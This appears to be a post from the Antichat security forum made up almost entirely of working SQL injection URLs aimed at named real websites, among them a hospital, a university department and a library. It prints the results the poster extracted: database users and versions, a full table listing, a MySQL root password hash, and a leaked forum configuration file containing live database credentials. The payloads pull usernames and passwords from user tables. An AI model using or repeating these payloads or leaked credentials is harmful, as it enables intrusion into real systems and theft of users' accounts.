ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.fvhospital.com/fr/news/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),17--+

db14709@64.13.192.31 : db14709_fvh_stage : 4.1.25-Debian_mt1

http://www.rnb-music.ru/news/index.html?-627+union+select+1,user(),3,4,5,6,7--

http://www.rnb-music.ru/news/index.html?-627+union+select+1,version(),3,4,5,6,7--

http://www.rnb-music.ru/news/index.html?-627+union+select+1,database(),3,4,5,6,7--

http://www.rnb-music.ru/news/index.html?-627+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--

» afisha (262)
» articles (76)
» artist (44)
» ban_ip (190)
» ban_name (186)
» banners (23)
» billboard (296)
» bios (19)
» booking (6)
» catalog (3)
» celebs_comments (10331)
» chart (12521)
» chart_name (3)
» chart_type (5)
» charts (24)
» city (13)
» clubs (52)
» comments (40953)
» contest (2)
» dance (8)
» demos (19)
» demos2 (3)
» dj (23)
» dj_comments (301)
» djmail (337)
» feedback (904)
» links (823)
» lyrics (8173)
» mixes (56)
» myalbums (8)
» myphotos (1059)
» myphotos_comments (3287)
» myphotos_stats (190415)
» myphotos_text (969)
» newphotos (3538)
» news (609)
» photo_comments (19213)
» photos (122)
» q_a (25)
» releases (439)
» reviews (32)
» ru_comments (7)
» ru_rnb (10)
» ru_tracks (34)
» showed (29444)
» showed_celebs (1123)
» showed_myphotos (4235)
» subscr (153)
» test (1)
» testing (0)
» tracks (195)
» u2u (1)
» users (6873)
» videos (78)
» week_chart (1018)
» xmb_attachments (428)
» xmb_banned (46)
» xmb_buddys (342)
» xmb_captchaimages (14049)
» xmb_favorites (2127)
» xmb_forums (26)
» xmb_logs (1929)
» xmb_members (10092)
» xmb_posts (410819)
» xmb_ranks (10)
» xmb_regimages (0)
» xmb_restricted (6)
» xmb_settings (1)
» xmb_smilies (74)
» xmb_templates (199)
» xmb_themes (1)
» xmb_threads (24808)
» xmb_u2u (36507)
» xmb_vote_desc (1650)
» xmb_vote_results (2538)
» xmb_vote_voters (6188)
» xmb_whosonline (33)
» xmb_words (4)

http://www.rnb-music.ru/news/index.html?-627+union+select+1,name,3,4,5,6,7+from+users--

http://www.rnb-music.ru/news/index.html?-627+union+select+1,pass,3,4,5,6,7+from+users--

http://www.rnb-music.ru/news/index.html?-627+union+select+1,username,3,4,5,6,7+from+xmb_members--

http://www.rnb-music.ru/news/index.html?-627+union+select+1,password,3,4,5,6,7+from+xmb_members--

www.rnb-music.ru/admin

<?php

if (!defined('IN_CODE')) {
    exit("Not allowed to run this file directly.");
}

    $dbname         = 'altero_rnb';       // Name of your database
    $dbuser         = 'altero_rnb';       // Username used to access it
    $dbpw           = 'a12345';      // Password used to access it
    $dbhost         = 'localhost';  // Database host, usually 'localhost'
    $database       = 'mysql';      // Database type, currently only mysql is supported.
    $pconnect       = 0;            // Persistent connection, 1 = on, 0 = off, use if 'too many connections'-errors appear

// Table Settings
    $tablepre       = 'xmb_';   // Table-pre

// Path-settings
    // In full_path, put the full URL you see when you go to your boards, WITHOUT the filename though!!
    // And please, don't forget the / at the end...
    $full_url       = 'http://rnb-music.ru/konfa/';

// Other settings
    // There are situations where you don't want to see the <!-- template start: index -->...<!-- template end: index -->
    // tags around each template. In those cases, change the following to false, or true to turn it back on.
    // Default value: false;
    $comment_output = true;

    // Alternative mailer
    // some hosts prevent the direct use of sendmail, which php uses to send out emails by default.
    // To get around this, we have included code which will contact a separate SMTP server of your
    // choice, and will send the mail trough that. The following mailer-options are available:
    // 'default'        => php's internal mail() function. No additional values need to be set:
    //                     (does not require a username/password/host/port)
    // 'socket_SMTP'    => a connection to the SMTP server trough sockets. Requires the username,
    //                     password, host and port values to be entered correctly to work.
    $mailer['type']     = 'default';

    // mailer-options (for socket_SMTP only, currently)
    $mailer['username'] = 'MAILER_USER';
    $mailer['password'] = 'MAILER_PASS';
    $mailer['host']     = 'MAILER_HOST';
    $mailer['port']     = 'MAILER_PORT';

// Plugin Settings
    $i = 1;
    // Plugins are the links in the navigation part of the Header. Plugins built-in by default include Search, FAQ, Member List, Today's Posts, Stats and Board Rules.
    // To add extra plugins (links of your own), just edit the code between Start Plugin Code and End Plugin Code. If you with to add more than one, simply copy that block, paste it and add the second one.

    // Start Plugin code
    $plugname[$i]    = '';       // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
    $plugurl[$i]     = '';       // This is the location, link, or URL to the plugin
    $plugadmin[$i]   = false;    // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
    $plugimg[$i]     = '';       // This is the path (full URL) to the image to show in front of the text.
    $i++;
    // End plugin code.

    // Start Plugin code for plugin #2
    $plugname[$i]    = '';       // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
    $plugurl[$i]     = '';       // This is the location, link, or URL to the plugin
    $plugadmin[$i]   = false;    // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
    $plugimg[$i]     = '';       // This is the path (full URL) to the image to show in front of the text.
    $i++;
    // End plugin code for plugin #2

    // To make multiple plugins, copy and paste this plugin-code, so you have multiple entries.

// Registration settings
    /***************
     * The ipcheck, checks if your IP is a valid IPv4 or IPv6 type, if none of these, it will kill.
     * this might shut a few users out, so you can turn it off by changing the $ipcheck variable to 'off'
     ****************
     * The allow_spec_q variable specifies if Special queries (eg. USE database and SHOW DATABASES) are allowed.
     * By default, they are not, meaning $allow_spec_q = false;
     * To allow them, change $allow_spec_q to true ($allow_spec_q = true;)
     ****************
     * The show_full_info variable lets you decide wether to show the Build and Alpha/Beta/SP markings in the HTML or not.
     * Change the value to true to show them, or false to turn them off.
     * Default = true;
     ****************/

    $ipcheck        = 'off';
    $allow_spec_q   = true;
    $show_full_info = false;
 
    define('DEBUG', false);
    // define('DEBUG', true);

?>

http://www.opaloman.org/data.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8--

http://www.host-park.ru/data.php?id=-10+union+select+concat_ws(0x3a,version(),database(),user()),2,3--

http://www.corecta.com/prestige/data.php?id=-2063+union+select+concat_ws(0x3a,version(),database(),user())

http://www.city-site.com.ua/data.php?m=1&cat=1&subcat=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--

http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--

http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--

http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+information_schema.tables--

http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,concat_ws(0x3a,user,password,file_priv)%20,4,5,6,7,8+from+mysql.user--+

root:141091821ee9bcaa:Y

http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8+from+mysql.user--+

volex@1-srv.geostroi.ru : geostroy : 4.0.12-max-nt

www.geostroy.ru/admin

http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*

http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+group_concat(username,0x3a,password)+from+users/*